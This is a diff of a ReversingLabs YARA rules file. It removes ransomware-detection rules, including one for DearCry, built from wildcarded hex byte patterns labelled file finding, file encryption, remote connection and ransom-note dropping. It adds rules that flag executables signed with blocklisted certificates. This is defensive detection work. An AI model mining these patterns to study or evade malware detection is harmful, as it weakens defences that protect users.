-            8D 42 ?? 3B C1 0F 42 C8 03 CE EB ?? 3B CE 74 ?? 49 80 39 ?? 75 ?? 2B CE EB ?? 83 C9
-            ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 83 65 ?? ?? 8D 71 ?? C7 45 ?? ?? ?? ?? ?? C6 45
-        }
-		$find_files_p2 = {
-            3B D6 0F 82 ?? ?? ?? ?? 2B D6 8D 45 ?? 83 C9 ?? 83 FA ?? 0F 42 CA 83 7D ?? ?? 51 0F
-            43 45 ?? 8D 4D ?? 03 C6 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 45 ?? 50 83
-            61 ?? ?? 83 61 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 0F 85 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 51 51 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ??
-            6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 70 ?? 03 30 3B F7 7D ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 3B F7 7D ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 45 ?? 8D 4D ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ??
-            ?? ?? 83 45 ?? ?? EB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ??
-            C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ??
-            ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 7D ?? 8B 75 ?? 6A ?? 5B 3B F7 74 ?? 56 E8 ?? ?? ??
-            ?? 03 F3 59 3B F7 75 ?? 8B 7D ?? 8B 75 ?? 85 F6 74 ?? 3B F7 74 ?? 8B CE E8 ?? ?? ??
-            ?? 03 F3 3B F7 75 ?? 8B 75 ?? 8B 45 ?? 2B C6 99 F7 FB 6B C0 ?? 50 56 E8 ?? ?? ?? ??
-            59 59 8D 4D ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E8
-        }
-		$remote_connection_p1 = {
-            55 8D AC 24 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50
-            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 85 ?? ?? ?? ?? 53 56 57 50 8D 45 ?? 64 A3
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 BA ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
-            ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 0F 43
-            8D ?? ?? ?? ?? 03 F9 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? 0F 43 B5 ?? ?? ?? ?? 33 C0 66 89 85 ?? ?? ?? ?? 33 DB 8B C7 89 9D
-        }
-		$remote_connection_p2 = {
-            2B C6 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? EB ?? 66 0F BE 06 8D
-            8D ?? ?? ?? ?? 0F B7 C0 50 E8 ?? ?? ?? ?? 46 3B F7 75 ?? 53 53 53 53 68 ?? ?? ?? ??
-            C6 45 ?? ?? 88 5D ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 6A ?? 33 C0 50
-            6A ?? 50 50 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89 45 ?? 85
-            C0 74 ?? 6A ?? 68 ?? ?? ?? ?? 33 C9 51 51 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 8B F0 85 F6 74 ?? 33 C0 50 50 50 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68
-            ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ??
-            83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 FF D7 FF 75 ?? FF D7 53 FF
-            D7 80 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8D ?? ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 81
-            C5 ?? ?? ?? ?? C9 C3 8B 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 73 ??
-            8D 95 ?? ?? ?? ?? C6 84 05 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ??
-            E9 ?? ?? ?? ?? E8
-        }
-		$encrypt_files_p1 = {
-            66 39 03 0F 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 33 C0 8D 8D ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8D 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 0F 43 95
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 5B C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 39 9D ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 8D 04 41 8D 8D ?? ?? ?? ?? 0F 43 8D ?? ?? ??
-            ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 BA ?? ?? ?? ?? 8D
-            4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D
-        }
-		$encrypt_files_p2 = {
-            8D ?? ?? ?? ?? 83 C4 ?? 3B C8 74 ?? 33 C9 88 4D ?? 8D 8D ?? ?? ?? ?? FF 75 ?? 50 E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? 56 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 33 C0 59 89 85 ??
-            ?? ?? ?? 89 8D ?? ?? ?? ?? 88 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 88
-            85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 45 ?? ?? 57 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 8D 4D
-            ?? E8 ?? ?? ?? ?? 33 C0 C6 45 ?? ?? 57 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 59 99 F7 F9 8D 4D ??
-            52 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 59 99 F7 F9 8D 8D ?? ?? ?? ?? 52 E8 ?? ?? ??
-            ?? 83 EB ?? 75 ?? 8D 95 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 51 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ??
-            ?? ?? ?? 39 9D ?? ?? ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? FF B5 ?? ??
-            ?? ?? 0F 43 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 56 8D 4D ?? E8 ?? ?? ?? ?? 59 8D 8D ??
-            ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 45 ??
-            C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51
-        }
-		$encrypt_files_p3 = {
-            8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 8D 45 ?? C6 45 ?? ?? 50 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ??
-            ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ??
-            E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 8B F3 39 B5 ?? ?? ?? ?? 76 ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8A 04 30 04 ?? 88 45 ?? FF 75 ?? E8 ?? ?? ??
-            ?? 46 3B B5 ?? ?? ?? ?? 72 ?? 8B F3 39 B5 ?? ?? ?? ?? 76 ?? 83 BD ?? ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 8A 04 30 2C ?? 88 45 ?? FF 75
-            ?? E8 ?? ?? ?? ?? 46 3B B5 ?? ?? ?? ?? 72 ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 50 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43
-        }
-		$encrypt_files_p4 = {
-            85 ?? ?? ?? ?? 51 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? BE ?? ??
-            ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 56 50 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ??
-            ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D
-            ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
-            C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45
-            ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ??
-            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ??
-            59 59 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ??
-            ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 8D 8D ??
-            ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 8D
-        }
-		$encrypt_files_p5 = {
-            85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85 ?? ?? ?? ?? 51 50 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ??
-            ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 56 50 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D
-            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? 51 8B C8 E8 ?? ?? ?? ?? 50 8D 4D ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D
-        }
-		$encrypt_files_p6 = {
-            E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 EC ?? 8D 85 ?? ?? ?? ?? 8B CC 89 65 ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ?? ?? 83
-            EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ?? ?? ??
-            ?? 83 EC ?? C6 45 ?? ?? 8B CC 89 65 ?? 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ??
-            ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ?? 89 59 ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ??
-            8D 95 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 95 ??
-            ?? ?? ?? 03 CA 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 2B C8 51 50 56 E8 ?? ?? ??
-            ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ??
-            68
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "18:b7:00:a3:19:aa:98:ae:71:b2:79:d4:e8:03:0b:82" and 1479686400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_169138A86954Be1D9B264F47 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "56653f72-39af-50e7-9908-e516f9b21084"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16926-L16942"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1584e39b4e2025611bcb7bbbd92b97d25d12ddbb1e5c282db87730a03f7f56b1"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "16:91:38:a8:69:54:be:1d:9b:26:4f:47" and 1477636474 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Dearcry : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_33412168Eeb3C0E4C7Dd0508A9Ffecd5 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects DearCry ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6e2097e0-6495-5185-bbbc-e8168fa0ca7f"
-		date = "2021-03-12"
-		modified = "2021-03-12"
+		id = "db2ae33e-d3af-5200-ad15-824e29434e2c"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.DearCry.yara#L1-L96"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "40dde232255018e1bc0aadf2378a7a86a99327d13dda58d8ffc5bb38e164de26"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16944-L16960"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d634af0637c3349fe1718ee807b8a75007ab46b141494331901a22ce54e9fc5d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "DearCry"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$drop_ransom_note_p1 = {
-            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 53 56 57 33 DB 68 ?? ?? ?? ?? 50 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 1D ?? ??
-            ?? ?? 89 1D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 1D ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 89 44 24 ?? E8
-            ?? ?? ?? ?? 8B F0 6A ?? 68 ?? ?? ?? ?? 89 74 24 ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ??
-            E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 3B F3 0F 84 ?? ?? ?? ?? 3B FB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 5C 24 ?? B8 ?? ?? ?? ?? 33 F6 8B FF
-            38 18 74 ?? 50 E8 ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 83 C4 ?? 8B D7 8A 08 88 0A 40 42 84
-            C9 75 ?? 8B C7 33 F6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 74 ?? 0F BE 14 37 52 E8 ??
-            ?? ?? ?? 88 04 37 8B C7 83 C4 ?? 46 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F0 72 ??
-            8B 74 24 ?? 46 89 74 24 ?? 69 F6 ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 3B C3 75 ?? 6A ?? 68
-        }
-		$drop_ransom_note_p2 = {
-            89 5C 24 ?? E8 ?? ?? ?? ?? 53 8B F0 53 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 56 89 44 24
-            ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8B F8 3B C3 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 85 C0 0F 86 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 53 51 88 5C 24 ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            8A 44 1C ?? 3C ?? 7C ?? 3C ?? 7E ?? 3C ?? 0F 8C ?? ?? ?? ?? 3C ?? 0F 8F ?? ?? ?? ??
-            0F BE C0 50 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ??
-            8D 54 24 ?? 52 FF D6 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 8B
-            4C 24 ?? 8B 54 24 ?? 8B 44 24 ?? 51 52 50 6A ?? 8D 4C 24 ?? 51 57 E8 ?? ?? ?? ?? 0F
-            BE 54 1C ?? 68 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? B8 ?? ?? ?? ?? 8D 50
-            ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 56 2B C2 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56
-            E8 ?? ?? ?? ?? 83 C4 ?? 43 81 FB ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 33 DB 57
-        }
-		$find_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? B8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 31 45 ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64
